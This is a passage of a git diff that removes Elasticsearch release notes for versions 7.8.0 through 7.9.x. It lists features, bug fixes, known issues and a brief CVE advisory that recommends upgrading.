-* Add new inference_config field to trained model config {es-pull}54421[#54421] -* Add failed_category_count to model_size_stats {es-pull}55716[#55716] (issue: {es-issue}1130[#1130]) -* Add prediction_field_type to inference config {es-pull}55128[#55128] -* Allow a certain number of ill-formatted rows when delimited format is specified {es-pull}55735[#55735] (issue: {es-issue}38890[#38890]) -* Apply default timeout in StopDataFrameAnalyticsAction.Request {es-pull}55512[#55512] -* Create an annotation when a model snapshot is stored {es-pull}53783[#53783] (issue: {es-issue}52149[#52149]) -* Do not execute ML CRUD actions when upgrade mode is enabled {es-pull}54437[#54437] (issue: {es-issue}54326[#54326]) -* Make find_file_structure recognize Kibana CSV report timestamps {es-pull}55609[#55609] (issue: {es-issue}55586[#55586]) -* More advanced model snapshot retention options {es-pull}56125[#56125] (issue: {es-issue}52150[#52150]) -* Return assigned node in start/open job/datafeed response {es-pull}55473[#55473] (issue: {es-issue}54067[#54067]) -* Skip daily maintenance activity if upgrade mode is enabled {es-pull}54565[#54565] (issue: {es-issue}54326[#54326]) -* Start gathering and storing inference stats {es-pull}53429[#53429] -* Unassign data frame analytics tasks in SetUpgradeModeAction {es-pull}54523[#54523] (issue: {es-issue}54326[#54326]) -* Speed up anomaly detection for the lat_long function {ml-pull}1102[#1102] -* Reduce CPU scheduling priority of native analysis processes to favor the ES -JVM when CPU is constrained. This change is implemented only for Linux and macOS, -not for Windows {ml-pull}1109[#1109] -* Take `training_percent` into account when estimating memory usage for -classification and regression {ml-pull}1111[#1111] -* Support maximize minimum recall when assigning class labels for multiclass -classification {ml-pull}1113[#1113] -* Improve robustness of anomaly detection to bad input data {ml-pull}1114[#1114] -* Add new `num_matches` and `preferred_to_categories` fields to category output -{ml-pull}1062[#1062] -* Add mean squared logarithmic error (MSLE) for regression {ml-pull}1101[#1101] -* Add pseudo-Huber loss for regression {ml-pull}1168[#1168] -* Reduce peak memory usage and memory estimates for classification and regression -{ml-pull}1125[#1125].) -* Reduce variability of classification and regression results across our target -operating systems {ml-pull}1127[#1127] -* Switch data frame analytics model memory estimates from kilobytes to -megabytes {ml-pull}1126[#1126] (issue: {es-issue}54506[#54506]) -* Add a {ml} native code build for Linux on AArch64 {ml-pull}1132[#1132], -{ml-pull}1135[#1135] -* Improve data frame analytics runtime by optimising memory alignment for intrinsic -operations {ml-pull}1142[#1142] -* Fix spurious anomalies for count and sum functions after no data are received -for long periods of time {ml-pull}1158[#1158] -* Improve false positive rates from periodicity test for time series anomaly -detection {ml-pull}1177[#1177] -* Break progress reporting of data frame analyses into multiple phases {ml-pull}1179[#1179] -* Really centre the data before training for classification and regression begins. This -means we can choose more optimal smoothing bias and should reduce the number of trees -{ml-pull}1192[#1192] - -Mapping:: -* Merge V2 index/component template mappings in specific manner {es-pull}55607[#55607] (issue: {es-issue}53101[#53101]) - -Recovery:: -* Avoid copying file chunks in peer covery {es-pull}56072[#56072] (issue: {es-issue}55353[#55353]) -* Retry failed peer recovery due to transient errors {es-pull}55353[#55353] - -SQL:: -* Add BigDecimal support to JDBC {es-pull}56015[#56015] (issue: {es-issue}43806[#43806]) -* Drop BASE TABLE type in favour for just TABLE {es-pull}54836[#54836] -* Relax version lock between server and clients {es-pull}56148[#56148] - -Search:: -* Consolidate DelayableWriteable {es-pull}55932[#55932] -* Exists queries to MatchNoneQueryBuilder when the field is unmapped {es-pull}54857[#54857] -* Rewrite wrapper queries to match_none if possible {es-pull}55271[#55271] -* SearchService#canMatch takes into consideration the alias filter {es-pull}55120[#55120] (issue: {es-issue}55090[#55090]) - -Snapshot/Restore:: -* Add GCS support for searchable snapshots {es-pull}55403[#55403] -* Allocate searchable snapshots with the balancer {es-pull}54889[#54889] (issues: {es-issue}50999[#50999], {es-issue}54729[#54729]) -* Allow bulk snapshot deletes to abort {es-pull}56009[#56009] (issue: {es-issue}55773[#55773]) -* Allow deleting multiple snapshots at once {es-pull}55474[#55474] -* Allow searching of snapshot taken while indexing {es-pull}55511[#55511] (issue: {es-issue}50999[#50999]) -* Allow to prewarm the cache for searchable snapshot shards {es-pull}55322[#55322] -* Enable prewarming by default for searchable snapshots {es-pull}56201[#56201] (issue: {es-issue}55952[#55952]) -* Permit searches to be concurrent to prewarming {es-pull}55795[#55795] -* Reduce contention in CacheFile.fileLock() method {es-pull}55662[#55662] -* Require soft deletes for searchable snapshots {es-pull}55453[#55453] -* Searchable Snapshots should respect max_restore_bytes_per_sec {es-pull}55952[#55952] -* Update the HDFS version used by HDFS Repo {es-pull}53693[#53693] -* Use streaming reads for GCS {es-pull}55506[#55506] (issue: {es-issue}55505[#55505]) -* Use workers to warm cache parts {es-pull}55793[#55793] (issue: {es-issue}55322[#55322]) - -Task Management:: -* Add indexName in update-settings task name {es-pull}55714[#55714] -* Add scroll info to search task description {es-pull}54606[#54606] -* Broadcast cancellation to only nodes have outstanding child tasks {es-pull}54312[#54312] (issues: {es-issue}50990[#50990], {es-issue}51157[#51157]) -* Support hierarchical task cancellation {es-pull}54757[#54757] (issue: {es-issue}50990[#50990]) - -Transform:: -* Add throttling {es-pull}56007[#56007] (issue: {es-issue}54862[#54862]) - - - -[[bug-7.8.0]] -[discrete] -=== Bug fixes - -Aggregations:: -* Add analytics plugin usage stats to _xpack/usage {es-pull}54911[#54911] (issue: {es-issue}54847[#54847]) -* Aggregation support for Value Scripts that change types {es-pull}54830[#54830] (issue: {es-issue}54655[#54655]) -* Allow terms agg to default to depth first {es-pull}54845[#54845] -* Clean up how pipeline aggs check for multi-bucket {es-pull}54161[#54161] (issue: {es-issue}53215[#53215]) -* Fix auto_date_histogram serialization bug {es-pull}54447[#54447] (issues: {es-issue}54382[#54382], {es-issue}54429[#54429]) -* Fix error massage for unknown value type {es-pull}55821[#55821] (issue: {es-issue}55727[#55727]) -* Fix scripted metric in CCS {es-pull}54776[#54776] (issue: {es-issue}54758[#54758]) -* Use Decimal formatter for Numeric ValuesSourceTypes {es-pull}54366[#54366] (issue: {es-issue}54365[#54365]) - -Allocation:: -* Fix Broken ExistingStoreRecoverySource Deserialization {es-pull}55657[#55657] (issue: {es-issue}55513[#55513]) - - -Features/ILM+SLM:: -* ILM stop step execution if writeIndex is false {es-pull}54805[#54805] - -Features/Indices APIs:: -* Fix NPE in MetadataIndexTemplateService#findV2Template {es-pull}54945[#54945] -* Fix creating filtered alias using now in a date_nanos range query failed {es-pull}54785[#54785] (issue: {es-issue}54315[#54315]) -* Fix simulating index templates without specified index {es-pull}56295[#56295] (issues: {es-issue}53101[#53101], {es-issue}56255[#56255]) -* Validate non-negative priorities for V2 index templates {es-pull}56139[#56139] (issue: {es-issue}53101[#53101]) - -Features/Watcher:: -* Ensure watcher email action message ids are always unique {es-pull}56574[#56574] - -Infra/Core:: -* Add generic Set support to streams {es-pull}54769[#54769] (issue: {es-issue}54708[#54708]) - -Machine Learning:: -* Fix GET _ml/inference so size param is respected {es-pull}57303[#57303] (issue: {es-issue}57298[#57298]) -* Fix file structure finder multiline merge max for delimited formats {es-pull}56023[#56023] -* Validate at least one feature is available for DF analytics {es-pull}55876[#55876] (issue: {es-issue}55593[#55593]) -* Trap and fail if insufficient features are supplied to data frame analyses. -Otherwise, classification and regression got stuck at zero analyzing progress -{ml-pull}1160[#1160] (issue: {es-issue}55593[#55593]) -* Make categorization respect the model_memory_limit {ml-pull}1167[#1167] -(issue: {ml-issue}1130[#1130]) -* Respect user overrides for max_trees for classification and regression -{ml-pull}1185[#1185] -* Reset memory status from soft_limit to ok when pruning is no longer required -{ml-pull}1193[#1193] (issue: {ml-issue}1131[#1131]) -* Fix restore from training state for classification and regression -{ml-pull}1197[#1197] -* Improve the initialization of seasonal components for anomaly detection -{ml-pull}1201[#1201] (issue: {ml-issue}#1178[#1178]) - -Network:: -* Fix issue with pipeline releasing bytes early {es-pull}54458[#54458] -* Handle TLS file updates during startup {es-pull}54999[#54999] (issue: {es-issue}54867[#54867]) - -SQL:: -* Fix DATETIME_PARSE behaviour regarding timezones {es-pull}56158[#56158] (issue: {es-issue}54960[#54960]) - -Search:: -* Don't expand default_field in query_string before required {es-pull}55158[#55158] (issue: {es-issue}53789[#53789]) -* Fix `time_zone` for `query_string` and date fields {es-pull}55881[#55881] (issue: {es-issue}55813[#55813]) - -Security:: -* Fix certutil http for empty password with JDK 11 and lower {es-pull}55437[#55437] (issue: {es-issue}55386[#55386]) - -Transform:: -* Fix count when matching exact ids {es-pull}56544[#56544] (issue: {es-issue}56196[#56196]) -* Fix http status code when bad scripts are provided {es-pull}56117[#56117] (issue: {es-issue}55994[#55994]) - - - -[[regression-7.8.0]] -[discrete] -=== Regressions - -Infra/Scripting:: -* Don't double-wrap expression values {es-pull}54432[#54432] (issue: {es-issue}53661[#53661]) - diff --git a/docs/reference/release-notes/7.9.asciidoc b/docs/reference/release-notes/7.9.asciidoc deleted file mode 100644 index 973a562b615..00000000000 --- a/docs/reference/release-notes/7.9.asciidoc +++ /dev/null @@ -1,687 +0,0 @@ -[[release-notes-7.9.3]] -== {es} version 7.9.3 - -Also see <>. - -[[known-issues-7.9.3]] -[discrete] -=== Known issues - -* SQL: If a `WHERE` clause contains at least two relational operators joined by -`AND`, of which one is a comparison (`<=`, `<`, `>=`, `>`) and another one is -an inequality (`!=`, `<>`), both against literals or foldable expressions, the -inequality will be ignored. The workaround is to substitute the inequality -with a `NOT IN` operator. -+ -We have fixed this issue in {es} 7.10.1 and later versions. For more details, -see {es-issue}65488[#65488]. - -[[bug-7.9.3]] -[float] -=== Bug fixes - -Allocation:: -* InternalClusterInfoService should not ignore hidden indices {es-pull}62995[#62995] - -Audit:: -* Move RestRequestFilter to core {es-pull}63507[#63507] - -Authentication:: -* Ensure domain_name setting for AD realm is present {es-pull}61983[#61983] (issue: {es-issue}61859[#61859]) - -Authorization:: -* Fix API key role descriptors rewrite bug for upgraded clusters {es-pull}62917[#62917] (issue: {es-issue}62911[#62911]) - -CCR:: -* Retry CCR shard follow task when no seed node left {es-pull}63225[#63225] - -Cluster Coordination:: -* Uniquely associate term with update task during election {es-pull}62212[#62212] (issue: {es-issue}61437[#61437]) - -EQL:: -* Avoid filtering on tiebreakers {es-pull}63215[#63215] (issue: {es-issue}62781[#62781]) -* Fix bug in sequences with any pattern {es-pull}63007[#63007] (issue: {es-issue}62967[#62967]) - -Engine:: -* Fix to actually throttle indexing on getting activated {es-pull}61768[#61768] - -Features/Data streams:: -* Fix querying a data stream name in index field {es-pull}63170[#63170] - -Features/Ingest:: -* Handle error conditions when simulating ingest pipelines with verbosity enabled {es-pull}63327[#63327] (issue: {es-issue}63199[#63199]) -* Make for each processor resistant to field modification {es-pull}62791[#62791] (issue: {es-issue}62790[#62790]) - -Machine Learning:: -* Fix online updates with custom rules referencing filters {es-pull}63057[#63057] (issue: {es-issue}62948[#62948]) -* Reset reindexing progress when data frame analytics job resumes with incomplete reindexing {es-pull}62772[#62772] - -SQL:: -* Fix exception when using CAST on inexact field {es-pull}62943[#62943] (issue: {es-issue}60178[#60178]) - -Search:: -* Async search should retry updates on version conflict {es-pull}63652[#63652] (issue: {es-issue}63213[#63213]) - -Transform:: -* Fix possible NPE if transform task has no node assigned {es-pull}62946[#62946] (issue: {es-issue}62847[#62847]) -* Filter null objects from field caps request {es-pull}62945[#62945] - - - -[[upgrade-7.9.3]] -[float] -=== Upgrades - -Infra/Packaging:: -* Switch bundled JDK back to Oracle JDK {es-pull}63288[#63288] (issue: {es-issue}62709[#62709]) - - -[[release-notes-7.9.2]] -== {es} version 7.9.2 - -Also see <>. - -[[known-issues-7.9.2]] -[discrete] -=== Known issues - -* SQL: If a `WHERE` clause contains at least two relational operators joined by -`AND`, of which one is a comparison (`<=`, `<`, `>=`, `>`) and another one is -an inequality (`!=`, `<>`), both against literals or foldable expressions, the -inequality will be ignored. The workaround is to substitute the inequality -with a `NOT IN` operator. -+ -We have fixed this issue in {es} 7.10.1 and later versions. For more details, -see {es-issue}65488[#65488]. - -[[deprecation-7.9.2]] -[float] -=== Deprecations - -Infra/Plugins:: -* Deprecate xpack.eql.enabled setting and make it a no-op {es-pull}61375[#61375] (issue: {es-issue}54745[#54745]) - -[[enhancement-7.9.2]] -[float] -=== Enhancements - -Mapping:: -* Improve error messages on bad [format] and [null_value] params for date mapper {es-pull}61932[#61932] (issue: {es-issue}61712[#61712]) - -[[bug-7.9.2]] -[float] -=== Bug fixes - -Aggregations:: -* Cardinality request breaker leak {es-pull}62685[#62685] (issue: {es-issue}62439[#62439]) -* Fix bug with terms' min_doc_count {es-pull}62130[#62130] (issue: {es-issue}62084[#62084]) - -Analysis:: -* Fix standard filter BWC check to allow for cacheing bug {es-pull}62649[#62649] (issues: {es-issue}33310[#33310], {es-issue}51092[#51092], {es-issue}62644[#62644]) - -Authentication:: -* Ensure domain_name setting for AD realm is present {es-pull}61859[#61859] -* Update authc failure headers on license change {es-pull}61734[#61734] (issue: {es-issue}56318[#56318]) - -Authorization:: -* Ensure authz operation overrides transient authz headers {es-pull}61621[#61621] - -CCR:: -* CCR should retry on CircuitBreakingException {es-pull}62013[#62013] (issue: {es-issue}55633[#55633]) - -EQL:: -* Create the search request with a list of indices {es-pull}62005[#62005] (issue: {es-issue}60793[#60793]) - -Engine:: -* Allow enabling soft-deletes on restore from snapshot {es-pull}62018[#62018] (issue: {es-issue}61969[#61969]) - -Features/Data streams:: -* Always validate that only a create op is allowed in bulk api for data streams {es-pull}62766[#62766] (issue: {es-issue}62762[#62762]) -* Fix NPE when deleting multiple backing indices on a data stream {es-pull}62274[#62274] (issue: {es-issue}62272[#62272]) -* Fix data stream wildcard resolution bug in eql search api. {es-pull}61904[#61904] (issue: {es-issue}60828[#60828]) -* Prohibit the usage of create index api in namespaces managed by data stream templates {es-pull}62527[#62527] - -Features/ILM+SLM:: -* Fix condition in ILM step that cannot be met {es-pull}62377[#62377] - -Features/Ingest:: -* Add Missing NamedWritable Registration for ExecuteEnrichPolicyStatus {es-pull}62364[#62364] - -Features/Java High Level REST Client:: -* Drop assertion that rest client response warnings conform to RFC 7234 {es-pull}61365[#61365] (issues: {es-issue}60889[#60889], {es-issue}61259[#61259]) - -Infra/Packaging:: -* Check glibc version {es-pull}62728[#62728] (issue: {es-issue}62709[#62709]) - -Machine Learning:: -* Add null checks for C++ log handler {es-pull}62238[#62238] -* Persist progress when setting data frame analytics task to failed {es-pull}61782[#61782] -* Fix reporting of peak memory usage in memory stats for data frame analytics {ml-pull}1468[#1468] -* Fix reporting of peak memory usage in model size stats for anomaly detection {ml-pull}1484[#1484] - -Mapping:: -* Allow empty null values for date and IP field mappers {es-pull}62487[#62487] (issues: {es-issue}57666[#57666], {es-issue}62363[#62363]) -* Take resolution into account when parsing date null value {es-pull}61994[#61994] - -Network:: -* Log alloc description after netty processors set {es-pull}62741[#62741] - -SQL:: -* Do not resolve self-referencing aliases {es-pull}62382[#62382] (issue: {es-issue}62296[#62296]) - -Search:: -* Fix disabling `allow_leading_wildcard` {es-pull}62300[#62300] (issues: {es-issue}60959[#60959], {es-issue}62267[#62267]) -* Search memory leak {es-pull}61788[#61788] - -Transform:: -* Disable optimizations when using scripts in group_by {es-pull}60724[#60724] (issue: {es-issue}57332[#57332]) - - - -[[upgrade-7.9.2]] -[float] -=== Upgrades - -Infra/Packaging:: -* Upgrade the bundled JDK to JDK 15 {es-pull}62580[#62580] - -[[release-notes-7.9.1]] -== {es} version 7.9.1 - -Also see <>. - -[[known-issues-7.9.1]] -[discrete] -=== Known issues - -* SQL: If a `WHERE` clause contains at least two relational operators joined by -`AND`, of which one is a comparison (`<=`, `<`, `>=`, `>`) and another one is -an inequality (`!=`, `<>`), both against literals or foldable expressions, the -inequality will be ignored. The workaround is to substitute the inequality -with a `NOT IN` operator. -+ -We have fixed this issue in {es} 7.10.1 and later versions. For more details, -see {es-issue}65488[#65488]. - -[[feature-7.9.1]] -[float] -=== New features - -Search:: -* QL: Wildcard field type support {es-pull}58062[#58062] (issues: {es-issue}54184[#54184], {es-issue}58044[#58044]) - - - -[[enhancement-7.9.1]] -[float] -=== Enhancements - -CRUD:: -* Log more information when mappings fail on index creation {es-pull}61577[#61577] - -EQL:: -* Make endsWith function use a wildcard ES query wherever possible {es-pull}61160[#61160] (issue: {es-issue}61154[#61154]) -* Make stringContains function use a wildcard ES query wherever possible {es-pull}61189[#61189] (issue: {es-issue}58922[#58922]) - -Features/Stats:: -* Change severity of negative stats messages from WARN to DEBUG {es-pull}60375[#60375] - -Search:: -* Fix handling of alias filter in SearchService#canMatch {es-pull}59368[#59368] (issue: {es-issue}59367[#59367]) -* QL: Add filtering Query DSL support to IndexResolver {es-pull}60514[#60514] (issue: {es-issue}57358[#57358]) - -Snapshot/Restore:: -* Do not access snapshot repo on dedicated voting-only master node {es-pull}61016[#61016] (issue: {es-issue}59649[#59649]) - - - -[[bug-7.9.1]] -[float] -=== Bug fixes - -Authentication:: -* Call ActionListener.onResponse exactly once {es-pull}61584[#61584] - -Authorization:: -* Relax the index access control check for scroll searches {es-pull}61446[#61446] - -CCR:: -* Relax ShardFollowTasksExecutor validation {es-pull}60054[#60054] (issue: {es-issue}59625[#59625]) -* Set timeout of auto put-follow request to unbounded {es-pull}61679[#61679] (issue: {es-issue}56891[#56891]) -* Set timeout of master node requests on follower to unbounded {es-pull}60070[#60070] (issue: {es-issue}56891[#56891]) - -Cluster Coordination:: -* Restrict testing of legacy discovery to tests {es-pull}61178[#61178] (issue: {es-issue}61177[#61177]) - -EQL:: -* Return sequence join keys in the original type {es-pull}61268[#61268] (issue: {es-issue}59707[#59707]) - -Features/Data streams:: -* "no such index [null]" when indexing into data stream with op_type=index [ISSUE] {es-pull}60581[#60581] -* Data streams: throw ResourceAlreadyExists exception {es-pull}60518[#60518] -* Track backing indices in data streams stats from cluster state {es-pull}59817[#59817] - -Features/ILM+SLM:: -* Fix race in SLM master/cluster state listeners {es-pull}59801[#59801] - -Features/Ingest:: -* Fix handling of final pipelines when destination is changed {es-pull}59522[#59522] (issue: {es-issue}57968[#57968]) -* Fix wrong pipeline name in debug log {es-pull}58817[#58817] (issue: {es-issue}58478[#58478]) -* Fix wrong result when executing bulk requests with and without pipeline {es-pull}60818[#60818] (issue: {es-issue}60437[#60437]) -* Update regex file for es user agent node processor {es-pull}59697[#59697] (issue: {es-issue}59694[#59694]) - -IdentityProvider:: -* Only call listener once (SP template registration) {es-pull}60497[#60497] (issues: {es-issue}54285[#54285], {es-issue}54423[#54423]) - -Machine Learning:: -* Always write prediction_probability and prediction_score for classification inference {es-pull}60335[#60335] -* Ensure .ml-config index is updated before clearing anomaly job's finished_time {es-pull}61064[#61064] (issue: {es-issue}61157[#61157]) -* Ensure annotations index mappings are up to date {es-pull}61107[#61107] (issue: {es-issue}74935[#74935]) -* Handle node closed exception in ML result processing {es-pull}60238[#60238] (issue: {es-issue}60130[#60130]) -* Recover data frame extraction search from latest sort key {es-pull}61544[#61544] - -SQL:: -* Fix NPE on ambiguous GROUP BY {es-pull}59370[#59370] (issues: {es-issue}46396[#46396], {es-issue}56489[#56489]) -* Fix SYS COLUMNS schema in ODBC mode {es-pull}59513[#59513] (issue: {es-issue}59506[#59506]) - -Search:: -* Disable sort optimization on search collapsing {es-pull}60838[#60838] -* Search fix: query_string regex searches not working on wildcard fields {es-pull}60959[#60959] (issue: {es-issue}60957[#60957]) - -Snapshot/Restore:: -* Cleanly Handle S3 SDK Exceptions in Request Counting {es-pull}61686[#61686] (issue: {es-issue}61670[#61670]) -* Fix Concurrent Snapshot Create+Delete + Delete Index {es-pull}61770[#61770] (issue: {es-issue}61762[#61762]) - - - -[[upgrade-7.9.1]] -[float] -=== Upgrades - -Infra/Core:: -* Upgrade to Lucene 8.6.2 {es-pull}61688[#61688] (issue: {es-issue}61512[#61512]) - - - -[[release-notes-7.9.0]] -== {es} version 7.9.0 - -Also see <>. - -[float] -[[security-updates-7.9.0]] -=== Security updates - -* A field disclosure flaw was found in {es} when running a scrolling search with -field level security. If a user runs the same query another more privileged user -recently ran, the scrolling search can leak fields that should be hidden. This -could result in an attacker gaining additional permissions against a restricted -index. All versions of {es} before 7.9.0 and 6.8.12 are affected by this flaw. -You must upgrade to {es} version 7.9.0 or 6.8.12 to obtain the fix. -https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7019[CVE-2020-7019] - -[[known-issues-7.9.0]] -[discrete] -=== Known issues - -* Upgrading to 7.9.0 from an earlier version will result in incorrect mappings -on the {ml} annotations index, and possibly also on the {ml} config index. This -will lead to some pages in the {ml} UI not displaying correctly, and may prevent -{ml-jobs} being created or updated. The best way to avoid this problem if you -read about this known issue before upgrading is to manually update the mappings -on these indices in your old {es} version _before_ upgrading to 7.9.0. If you -find out about the issue after upgrading then reindexing is required to recover. -Full details of the mitigations are in -{ml-docs}/ml-troubleshooting.html#ml-troubleshooting-mappings[Upgrade to 7.9.0 causes incorrect mappings]. - -* Lucene 8.6.0, on which Elasticsearch 7.9.0 is based, - https://issues.apache.org/jira/browse/LUCENE-9478[contains a memory - leak]. This memory leak manifests in Elasticsearch when a single document is - updated repeatedly with a forced refresh. The cluster state storage layer in - Elasticsearch is based on Lucene and does use single-document updates with - forced refreshes, meaning that this memory leak manifests in Elasticsearch under - normal conditions. It also manifests when user-controlled workloads update a - single document in an index repeatedly with a forced refresh. In both cases, - the memory leak is around 500 bytes per update, so it does take some time for - the leak to show any meaningful impact on the system. Symptoms of this memory - leak are the size of the used heap slowly rising over time, requests - eventually being rejected by the real memory circuit breaker, and potentially - out-of-memory errors. A workaround is to restart any nodes exhibiting these - symptoms. We are actively working with the Lucene community to release a - https://github.com/apache/lucene-solr/pull/1779[fix] in Lucene 8.6.2 to - deliver in Elasticsearch 7.9.1 that will address this memory leak. - -* SQL: If a `WHERE` clause contains at least two relational operators joined by -`AND`, of which one is a comparison (`<=`, `<`, `>=`, `>`) and another one is -an inequality (`!=`, `<>`), both against literals or foldable expressions, the -inequality will be ignored. The workaround is to substitute the inequality -with a `NOT IN` operator. -+ -We have fixed this issue in {es} 7.10.1 and later versions. For more details, -see {es-issue}65488[#65488]. - -[[breaking-7.9.0]] -[discrete] -=== Breaking changes - -Script Cache:: -* Script cache size and rate limiting are per-context {es-pull}55753[#55753] (issue: {es-issue}50152[#50152]) - -Field capabilities API:: -* Constant_keyword fields are now described by their family type `keyword` instead of `constant_keyword` {es-pull}58483[#58483] (issue: {es-issue}53175[#53175]) - -Snapshot restore throttling:: -* Restoring from a snapshot (which is a particular form of recovery) is now - properly taking recovery throttling into account (i.e. the - `indices.recovery.max_bytes_per_sec` setting). - The `max_restore_bytes_per_sec` setting is also now defaulting to - unlimited, whereas previously it was set to `40mb`, which is the - default that's used for `indices.recovery.max_bytes_per_sec`. This means - that no behavioral change will be observed by clusters where the recovery - and restore settings had not been adapted from the defaults. {es-pull}58658[#58658] - -Thread pool write queue size:: -* The WRITE thread pool default queue size (`thread_pool.write.size`) has been - increased from 200 to 10000. A small queue size (200) caused issues when users - wanted to send small indexing requests with a high client count. Additional - memory-oriented back pressure has been introduced with the - `indexing_pressure.memory.limit` setting. This setting configures a limit to - the number of bytes allowed to be consumed by outstanding indexing requests. - {es-issue}59263[#59263] - -Dangling indices:: -* Automatically importing dangling indices is now deprecated, disabled by - default, and will be removed in {es} 8.0. See the - <>. - {es-pull}58176[#58176] {es-pull}58898[#58898] (issue: {es-issue}48366[#48366]) - -[[breaking-java-7.9.0]] -[discrete] -=== Breaking Java changes - -Aggregations:: -* Improve cardinality measure used to build aggs {es-pull}56533[#56533] (issue: {es-issue}56487[#56487]) - -Features/Ingest:: -* Add optional description parameter to ingest processors. {es-pull}57906[#57906] (issue: {es-issue}56000[#56000]) - - - -[[feature-7.9.0]] -[discrete] -=== New features - -Aggregations:: -* Add moving percentiles pipeline aggregation {es-pull}55441[#55441] (issue: {es-issue}49452[#49452]) -* Add normalize pipeline aggregation {es-pull}56399[#56399] (issue: {es-issue}51005[#51005]) -* Add variable width histogram aggregation {es-pull}42035[#42035] (issues: {es-issue}9572[#9572], {es-issue}50863[#50863]) -* Add pipeline inference aggregation {es-pull}58193[#58193] -* Speed up time interval arounding around daylight savings time (DST) {es-pull}56371[#56371] (issue: {es-issue}55559[#55559]) - -Geo:: -* Override doc_value parameter in Spatial XPack module {es-pull}53286[#53286] (issue: {es-issue}37206[#37206]) - -Machine Learning:: -* Add update data frame analytics jobs API {es-pull}58302[#58302] (issue: {es-issue}45720[#45720]) -* Introduce model_plot_config.annotations_enabled setting for anomaly detection jobs {es-pull}57539[#57539] (issue: {es-issue}55781[#55781]) -* Report significant changes to anomaly detection models in annotations of the results {ml-pull}1247[#1247], {es-pull}56342[#56342], {es-pull}56417[#56417], {es-pull}57144[#57144], {es-pull}57278[#57278], {es-pull}57539[#57539] - -Mapping:: -* Merge mappings for composable index templates {es-pull}58521[#58521] (issue: {es-issue}53101[#53101]) -* Wildcard field optimised for wildcard queries {es-pull}49993[#49993] (issue: {es-issue}48852[#48852]) - -Search:: -* Allow index filtering in field capabilities API {es-pull}57276[#57276] (issue: {es-issue}56195[#56195]) - - - -[[enhancement-7.9.0]] -[discrete] -=== Enhancements - -Aggregations:: -* Add support for numeric range keys {es-pull}56452[#56452] (issue: {es-issue}56402[#56402]) -* Added standard deviation / variance sampling to extended stats {es-pull}49782[#49782] (issue: {es-issue}49554[#49554]) -* Give significance lookups their own home {es-pull}57903[#57903] -* Increase search.max_buckets to 65,535 {es-pull}57042[#57042] (issue: {es-issue}51731[#51731]) -* Optimize date_histograms across daylight savings time {es-pull}55559[#55559] -* Return clear error message if aggregation type is invalid {es-pull}58255[#58255] (issue: {es-issue}58146[#58146]) -* Save memory on numeric significant terms when not top {es-pull}56789[#56789] (issue: {es-issue}55873[#55873]) -* Save memory when auto_date_histogram is not on top {es-pull}57304[#57304] (issue: {es-issue}56487[#56487]) -* Save memory when date_histogram is not on top {es-pull}56921[#56921] (issues: {es-issue}55873[#55873], {es-issue}56487[#56487]) -* Save memory when histogram agg is not on top {es-pull}57277[#57277] -* Save memory when numeric terms agg is not top {es-pull}55873[#55873] -* Save memory when parent and child are not on top {es-pull}57892[#57892] (issue: {es-issue}55873[#55873]) -* Save memory when rare_terms is not on top {es-pull}57948[#57948] (issue: {es-issue}55873[#55873]) -* Save memory when significant_text is not on top {es-pull}58145[#58145] (issue: {es-issue}55873[#55873]) -* Save memory when string terms are not on top {es-pull}57758[#57758] -* Speed up reducing auto_date_histo with a time zone {es-pull}57933[#57933] (issue: {es-issue}56124[#56124]) -* Speed up rounding in auto_date_histogram {es-pull}56384[#56384] (issue: {es-issue}55559[#55559]) - -Allocation:: -* Account for remaining recovery in disk allocator {es-pull}58029[#58029] - -Analysis:: -* Add max_token_length setting to the CharGroupTokenizer {es-pull}56860[#56860] (issue: {es-issue}56676[#56676]) -* Expose discard_compound_token option to kuromoji_tokenizer {es-pull}57421[#57421] -* Support multiple tokens on LHS in stemmer_override rules (#56113) {es-pull}56484[#56484] (issue: {es-issue}56113[#56113]) - -Authentication:: -* Add http proxy support for OIDC realm {es-pull}57039[#57039] (issue: {es-issue}53379[#53379]) -* Improve threadpool usage and error handling for API key validation {es-pull}58090[#58090] (issue: {es-issue}58088[#58088]) -* Support handling LogoutResponse from SAML idP {es-pull}56316[#56316] (issues: {es-issue}40901[#40901], {es-issue}43264[#43264]) - -Authorization:: -* Add cache for application privileges {es-pull}55836[#55836] (issue: {es-issue}54317[#54317]) -* Add monitor and view_index_metadata privileges to built-in `kibana_system` role {es-pull}57755[#57755] -* Improve role cache efficiency for API key roles {es-pull}58156[#58156] (issue: {es-issue}53939[#53939]) - -CCR:: -* Allow follower indices to override leader settings {es-pull}58103[#58103] - -CRUD:: -* Retry failed replication due to transient errors {es-pull}55633[#55633] - -Engine:: -* Don't log on RetentionLeaseSync error handler after an index has been deleted {es-pull}58098[#58098] (issue: {es-issue}57864[#57864]) - -Features/Data streams:: -* Add support for snapshot and restore to data streams {es-pull}57675[#57675] (issues: {es-issue}53100[#53100], {es-issue}57127[#57127]) -* Data stream creation validation allows for prefixed indices {es-pull}57750[#57750] (issue: {es-issue}53100[#53100]) -* Disallow deletion of composable template if in use by data stream {es-pull}57957[#57957] (issue: {es-issue}57004[#57004]) -* Validate alias operations don't target data streams {es-pull}58327[#58327] (issue: {es-issue}53100[#53100]) - -Features/ILM+SLM:: -* Add data stream support to searchable snapshot action {es-pull}57873[#57873] (issue: {es-issue}53100[#53100]) -* Add data stream support to the shrink action {es-pull}57616[#57616] (issue: {es-issue}53100[#53100]) -* Add support for rolling over data streams {es-pull}57295[#57295] (issues: {es-issue}53100[#53100], {es-issue}53488[#53488]) -* Check the managed index is not a data stream write index {es-pull}58239[#58239] (issue: {es-issue}53100[#53100]) - -Features/Indices APIs:: -* Add default composable templates for new indexing strategy {es-pull}57629[#57629] (issue: {es-issue}56709[#56709]) -* Add index block api {es-pull}58094[#58094] -* Add new flag to check whether alias exists on remove {es-pull}58100[#58100] -* Add prefer_v2_templates parameter to reindex {es-pull}56253[#56253] (issue: {es-issue}53101[#53101]) -* Add template simulation API for simulating template composition {es-pull}56842[#56842] (issues: {es-issue}53101[#53101], {es-issue}55686[#55686], {es-issue}56255[#56255], {es-issue}56390[#56390]) - -Features/Ingest:: -* Add ignore_empty_value parameter in set ingest processor {es-pull}57030[#57030] (issue: {es-issue}54783[#54783]) -* Support `if_seq_no` and `if_primary_term` for ingest {es-pull}55430[#55430] (issue: {es-issue}41255[#41255]) - -Features/Java High Level REST Client:: -* Add support for data streams {es-pull}58106[#58106] (issue: {es-issue}53100[#53100]) -* Enable decompression of response within LowLevelRestClient {es-pull}55413[#55413] (issues: {es-issue}24349[#24349], {es-issue}53555[#53555]) - -Features/Java Low Level REST Client:: -* Add isRunning method to RestClient {es-pull}57973[#57973] 